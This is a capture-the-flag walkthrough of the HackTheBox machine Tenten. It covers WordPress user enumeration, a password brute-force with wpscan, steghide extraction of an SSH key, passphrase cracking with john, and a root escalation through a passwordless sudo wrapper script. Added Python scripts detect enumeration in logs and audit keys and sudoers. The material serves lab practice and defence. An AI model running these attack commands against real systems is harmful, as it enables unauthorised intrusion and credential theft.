This walkthrough is for the HacktheBox retired machine named Tenten.
We pick Tenten from the list:
We start with the usual full-port scan:
nmap -sS -T4 -A -p- 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 20:51 EDT
Nmap scan report for 10.10.10.10
Host is up (0.26s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP P2000 G3 NAS device (94%), Android 4.1.1 (91%), Android 4.1.2 (91%), Linux 3.10 - 4.11 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Android 4.2.2 (Linux 3.4) (91%), DD-WRT v3.0 (Linux 4.4.2) (91%), Linux 4.1 (91%), Linux 4.4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   413.26 ms 10.10.14.1
2   413.43 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 584.34 seconds
While the scan was running I tried the default port 80 in the browser, http://10.10.10.10, and we can see right away that it is a WordPress site:
From looking around, the site just has the default theme and the default post with its comment.
But there is a Job Listing link in the menu. Let’s explore it, but first run wpscan against the site:
wpscan -e u --url http://10.10.10.10
We want to enumerate user IDs with the -e u switch and see which users we can find, along with vulnerabilities, versions and exposed files.
The user enumeration can also be done manually by appending /wp-json/wp/v2/users/ to the site URL.
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.10.10/
[+] Started: Thu Sep 26 20:58:52 2019

Interesting Finding(s):

[+] http://10.10.10.10/
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://10.10.10.10/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.10/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://10.10.10.10/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
 |
 | [!] 35 vulnerabilities identified:
 | ...

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:01 <=====================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] takis
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Finished: Thu Sep 26 20:59:05 2019
[+] Requests Done: 70
[+] Cached Requests: 7
[+] Data Sent: 14.062 KB
[+] Data Received: 24.943 MB
[+] Memory used: 111.887 MB
[+] Elapsed time: 00:00:12
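From the defender's side, every one of the techniques wpscan used to confirm the user (the REST users endpoint and the author-ID brute force) leaves a distinctive trail in the web server's access log. The script below is an added example, not part of the original walkthrough, that runs simple detection logic over a few constructed Apache combined-format log lines modelled on that traffic. The IP addresses, timestamps and user agents in the sample are made up; the request paths follow the patterns wpscan reported above.

```python
import re
from collections import defaultdict

# Constructed sample Apache access-log lines (not taken from the original walkthrough).
# They mimic the requests wpscan's user enumeration makes: the REST users endpoint
# and the ?author=N probes, plus ordinary traffic from a second client.
SAMPLE_LOG = """\
10.10.14.5 - - [26/Sep/2019:20:58:52 -0400] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:53 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:53 -0400] "GET /?author=2 HTTP/1.1" 404 0 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:54 -0400] "GET /?author=3 HTTP/1.1" 404 0 "-" "WPScan v3.6.3"
192.0.2.7 - - [26/Sep/2019:21:02:11 -0400] "GET /index.php/feed/ HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
192.0.2.7 - - [26/Sep/2019:21:02:12 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_enumeration(log_text, author_threshold=3):
    """Map client IP -> set of reasons for clients that look like they enumerate users.

    rest_users_endpoint : any hit on /wp-json/wp/v2/users (one request lists every author)
    author_id_bruteforce: at least author_threshold distinct ?author=N IDs from one client
    """
    rest_hits = defaultdict(int)
    author_ids = defaultdict(set)
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        if "/wp-json/wp/v2/users" in req["path"]:
            rest_hits[req["ip"]] += 1
        m = AUTHOR_RE.search(req["path"])
        if m:
            author_ids[req["ip"]].add(m.group(1))

    findings = {}
    for ip in set(rest_hits) | set(author_ids):
        reasons = set()
        if rest_hits[ip]:
            reasons.add("rest_users_endpoint")
        if len(author_ids[ip]) >= author_threshold:
            reasons.add("author_id_bruteforce")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in find_enumeration(SAMPLE_LOG).items():
        print(ip, ", ".join(sorted(reasons)))
```

A single visitor following one `?author=1` link is normal and is not flagged; the threshold on distinct IDs is what separates a crawler from an enumeration run. Hits on the REST users route are flagged on sight because one response lists every author, which is why many sites restrict that route to authenticated requests.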
We have a user, takis:
We then run a password attack scan on it:
wpscan -U takis -P /usr/share/wordlists/rockyou.txt --url http://10.10.10.10
While that runs, let’s look at the Job Listings link:
It looks like we can upload a file:
We could test-upload an image and see whether we can find it afterwards.
I right-clicked and saved the banner image as banner.jpg to use as the CV file.
After some reading it looks like the Job Manager creates a new private page for each uploaded resume. When we first submitted the application we may have noticed the URL /apply/8/; since the Hello World post is post 1 and this one is post 8, let’s see what the IDs in between and after it hold.
As you can see, we are getting the drafts and unpublished posts, so the private pages are exposed somewhere.
WordPress generally stores uploads in a predictable directory named by year and month, so we try that path (replacing the month and year with the current values):
And it works.
I attempted to upload a PHP reverse shell disguised as a jpg or csv but was not successful.
Back to enumerating the private posts, we see that post 13 has an interesting message:
Given that one was created with the title "banner" for the banner.jpg I uploaded, I am going to check whether this one is also a photo. From the Archive page, it looks like it was made in April 2017.
This might be one of those where the message is (unrealistically) hidden in the image.
So we download it:
I couldn’t see much using stegsolve, so I install steghide:
apt install -y libjpeg-dev libmcrypt-dev libmhash-dev
apt install -y steghide
Then run it against the file; I took a guess and left the passphrase blank:
steghide extract -sf HackerAccessGranted.jpg
Enter passphrase: <empty>
wrote extracted data to "id_rsa".
Looks like an SSH private key, but it is still encrypted with a passphrase.
If we try to ssh as the user with this key it won’t work until the passphrase is recovered.
Let’s attempt to crack the passphrase with ssh2john and john:
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash && /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
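The only thing standing between that leaked id_rsa and a login was its passphrase, and a weak one fell to a wordlist. A useful defensive check is to audit whether private keys on a host are passphrase-protected at all. The script below is an added example, not from the original walkthrough, that decides this for both on-disk formats ssh-keygen has produced: the legacy PEM format (encrypted keys carry a Proc-Type: 4,ENCRYPTED header) and the native openssh-key-v1 format (the base64 body starts with a magic string followed by the cipher name, which is "none" for an unencrypted key). The sample keys are constructed and contain no key material; only the header fields the check reads are present.

```python
import base64
import re
import struct

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data):
    """Encode bytes as an SSH wire-format string (uint32 big-endian length + bytes)."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf, offset):
    """Decode one SSH wire-format string from buf at offset; return (bytes, new_offset)."""
    (n,) = struct.unpack(">I", buf[offset:offset + 4])
    return buf[offset + 4:offset + 4 + n], offset + 4 + n


def key_is_passphrase_protected(key_text):
    """True if the private key in key_text needs a passphrase, False if it is stored in the clear.

    - OpenSSH native ("BEGIN OPENSSH PRIVATE KEY"): base64 body = magic, ciphername, kdfname, ...
      A ciphername of "none" means the key is unencrypted.
    - Legacy PEM ("BEGIN RSA PRIVATE KEY" etc.): encrypted keys carry a
      "Proc-Type: 4,ENCRYPTED" header line before the base64 body.
    """
    if "BEGIN OPENSSH PRIVATE KEY" in key_text:
        body = "".join(l.strip() for l in key_text.splitlines() if not l.startswith("-----"))
        raw = base64.b64decode(body)
        if not raw.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, _ = _read_ssh_string(raw, len(MAGIC))
        return cipher != b"none"
    if "PRIVATE KEY-----" in key_text:
        return re.search(r"^Proc-Type:\s*4,ENCRYPTED", key_text, re.M) is not None
    raise ValueError("unrecognised private key format")


def audit_keys(keys):
    """Return the names of keys (dict name -> text) that are NOT passphrase-protected."""
    return sorted(name for name, text in keys.items() if not key_is_passphrase_protected(text))


# --- Constructed samples (no real key material) ---------------------------------
def _openssh_sample(cipher):
    # Only the leading fields the check reads: magic, ciphername, kdfname.
    raw = MAGIC + _ssh_string(cipher) + _ssh_string(b"none" if cipher == b"none" else b"bcrypt")
    b64 = base64.b64encode(raw).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 + "\n-----END OPENSSH PRIVATE KEY-----\n"


LEGACY_ENCRYPTED = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "Q09OU1RSVUNURUQgUExBQ0VIT0xERVI=\n"  # placeholder body, not a key
    "-----END RSA PRIVATE KEY-----\n"
)
LEGACY_CLEAR = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Q09OU1RSVUNURUQgUExBQ0VIT0xERVI=\n"  # placeholder body, not a key
    "-----END RSA PRIVATE KEY-----\n"
)
SAMPLE_KEYS = {
    "id_rsa_legacy_encrypted": LEGACY_ENCRYPTED,
    "id_rsa_legacy_clear": LEGACY_CLEAR,
    "id_ed25519_encrypted": _openssh_sample(b"aes256-ctr"),
    "id_ed25519_clear": _openssh_sample(b"none"),
}

if __name__ == "__main__":
    print("keys without a passphrase:", audit_keys(SAMPLE_KEYS))
```

A passphrase only slows an attacker down by the strength of the passphrase, as the john run here shows; the check above tells you which keys have no protection at all, which is the first thing to fix.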
We get the password:
We then log in with it, using the -i switch to specify the identity (key) file:
ssh -i id_rsa takis@10.10.10.10
Then we grab the user flag.
As a bit of a detour I checked the WordPress config file to see whether the root account reused any of the passwords stored in it.
I didn’t really get anywhere from there.
Eventually, since we have a shell open, we start a simple web server locally and move over our enumeration script.
On our local Kali machine:
python -m SimpleHTTPServer 9999
We can fetch LinEnum with:
wget -O enum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Then, back on our shell on the target:
cd /tmp/ && wget http://10.10.XXX.XXX:9999/enum.sh
After it runs, it indicates that we have a sudo-privileged script that can be run without a password:
[+] We can sudo without supplying a password!
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
We check the file:
#!/bin/bash
$1 $2 $3 $4
So it takes up to four arguments and executes them with bash. We can use it to spawn a root bash shell:
sudo /bin/fuckin /bin/bash
Alright, it worked.
id
uid=0(root) gid=0(root) groups=0(root)
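The root cause here is a sudoers entry that grants NOPASSWD on a bare path, combined with a script that executes whatever arguments it receives. The audit script below is an added example, not part of the original walkthrough: it parses sudo -l style output and flags those two conditions, plus blanket ALL entries. The input mirrors the entries LinEnum printed above; the systemctl entry and the SCRIPT_SOURCES mapping are constructed for contrast and are not from the box.

```python
import re

# One "sudo -l" command entry: (runas) [TAG: ...] command [args]
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.*\S)\s*$")
# Positional parameters handed through to execution: $1..$9, $@, $*, ${1}, "$@"
PASSTHROUGH_RE = re.compile(r"\$(?:[1-9]|@|\*|\{[1-9@*]\})")

# Constructed "sudo -l" output. The first two command entries are the ones reported
# on the box; the systemctl line is an invented entry for contrast.
SUDO_L = """\
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Constructed map of allowed-command path -> script source (None for compiled binaries).
# On a real host this would be read from disk for each path in the sudoers output.
SCRIPT_SOURCES = {
    "/bin/fuckin": "#!/bin/bash\n$1 $2 $3 $4\n",
    "/usr/bin/systemctl": None,
}


def parse_sudo_l(text):
    """Yield (runas, nopasswd, cmd) for each command entry in sudo -l output."""
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            yield m.group("runas").strip(), "NOPASSWD" in m.group("tags"), m.group("cmd").strip()


def audit_sudo(text, script_sources):
    """Map each allowed command -> set of risk reasons.

    all_commands        : the entry is ALL
    nopasswd            : the entry runs without a password
    arbitrary_arguments : a bare path, so sudo lets the caller pass any arguments
    argument_passthrough: the target is a script that executes its own arguments
    """
    findings = {}
    for runas, nopasswd, cmd in parse_sudo_l(text):
        reasons = set()
        if cmd == "ALL":
            reasons.add("all_commands")
        else:
            parts = cmd.split()
            if len(parts) == 1:
                reasons.add("arbitrary_arguments")
            src = script_sources.get(parts[0])
            if src and PASSTHROUGH_RE.search(src):
                reasons.add("argument_passthrough")
        if nopasswd:
            reasons.add("nopasswd")
        if reasons:
            findings[cmd] = reasons
    return findings


def highest_risk(findings):
    """Commands whose reasons together let the caller run anything as the runas user."""
    return sorted(
        cmd for cmd, r in findings.items()
        if ("argument_passthrough" in r and "nopasswd" in r) or {"all_commands", "nopasswd"} <= r
    )


if __name__ == "__main__":
    findings = audit_sudo(SUDO_L, SCRIPT_SOURCES)
    for cmd, reasons in findings.items():
        print(f"{cmd}: {', '.join(sorted(reasons))}")
    print("highest risk:", highest_risk(findings))
```

The fix on the sudoers side is to drop the wrapper entry or pin its arguments (an entry with an explicit argument list only permits exactly those arguments), and on the script side never to execute untrusted positional parameters as commands.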
We then get to the root flag:
Success 😎 .